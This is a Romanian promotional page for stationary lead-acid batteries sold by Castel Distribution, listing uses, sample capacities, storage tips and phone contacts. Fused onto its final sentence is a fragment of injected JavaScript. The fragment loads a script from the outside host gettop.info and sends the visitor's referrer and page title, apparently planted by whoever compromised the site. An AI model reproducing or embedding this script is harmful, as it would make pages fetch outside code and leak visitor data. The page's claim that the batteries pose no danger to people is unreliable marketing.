castelCand iti desfasori activitatea intr-un domeniu in care se obtine energie electrica sau ai o locuinta prevazuta cu sisteme de incalzire alternativa, iti trebuie si acumulatori stationari din oferta Castel Distribution. Acestia au rolul de a inmagazina produsul pe care il obtii, pentru a-l utiliza ulterior.

Cumpara acumulatori stationari

Produsele din oferta Castel Distribution, din categoria acumulatori stationari, se folosesc pentru urmatoarele tipuri de instalatii: termice, electrice, de curenti slabi, de evacuare a apelor uzate etc. Intrucat au capacitate diversa, ele sunt recomandate si segmentului retail, si celui rezidential, si utilizatorilor industriali de talie mica si mijlocie. Asadar, daca detii un atelier de tamplarie sau o fabrica de confectii, spre exemplu, intr-o zona muntoasa, profita de ceea ce iti ofera mediul inconjurator si alimenteaza-ti sediul cu energie electrica alternativa, iar surplusul inmagazineaza-l in acumulatori stationari.

Acumulatori stationari se mai folosesc si pentru: iluminat de siguranta, sisteme de telecomunicatii, depozitarea energiei eoliene, puncte de transformare si sisteme de comanda etc.

In oferta Castel Distribution se gasesc acumulatori stationari din plumb, cu diverse puteri, greutati si dimensiuni. Pentru un utilizator casnic este potrivit un acumulator 6V 4Ah, de numai 0.7 kg. In schimb, pentru inmagazinarea unei cantitati mai mari de energie, trebuie unul 12V 17Ah, de 5.6 kg. Bine de stiut: cu cat este mai mare capacitatea acumulatorului, cu atat va fi mai mare si timpul de incarcare.

Acumulatori stationari – detalii tehnice

Se recomanda inmagazinarea surplusului de energie cu ajutorul catorva acumulatori stationari intrucat acestia…

– au durata indelungata de utilizare. Deci nu trebuie sa investesti foarte des in produse care sa stocheze energia obtinuta;

– sunt usor de utilizat si nu prezinta vreun pericol pentru om;

– constituie o sursa de aprovizionare nu doar pentru sistemul de iluminat de urgenta, ci si pentru statii solare, statii eoliene, tablouri electrice etc.

De asemenea, pentru o durata de utilizare cat mai mare si eficienta, se recomanda urmatoarele doua lucruri pentru acumulatori stationari:

– depozitare la temperaturi potrivite (nici foarte mari, nici foarte scazute – apropiate de inghet);

– instructiunile producatorului trebuie sa fie respectate.

Diverse intrebuintari – acumulatori stationari

Daca pana acum nu ai utilizat acumulatori stationari si mai avut si probleme in ceea ce priveste alimentarea cu energie electrica, este cazul sa cumperi acumulatori stationari. Uneori pot surveni diverse avarii la reteaua de electricitate, dar pentru ca acest lucru poate sa nu-ti afecteze activitatile, e bine sa ai o alternativa. Sera amenajata, floraria din curte ori site-ul pe care ti l-ai creat au nevoie de energie electrica non-stop. Oprind-o pe aceasta, plantele si legumele nu mai au nici lumina, nici caldura, iar site-ul devine nefunctional (asta daca serverul e la tine acasa, si nu in alta parte). Scapa de inconvenient achizitionand acumulatori stationari ca sa nu simti cand se intrerupe alimentarea cu electricitate.

Cumpara din oferta Castel Distribution cati acumulatori stationari iti trebuie! Pentru mai multe detalii si informatii, ia legatura cu reprezentantii firmei, sunand la numerele de telefon 0722.995.519 si 0730.507.835. Sediul Castel Distribution se afla in Popești-Leordeni, str. Lt. Maj. Av. Tanase Banciu nr. 14.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;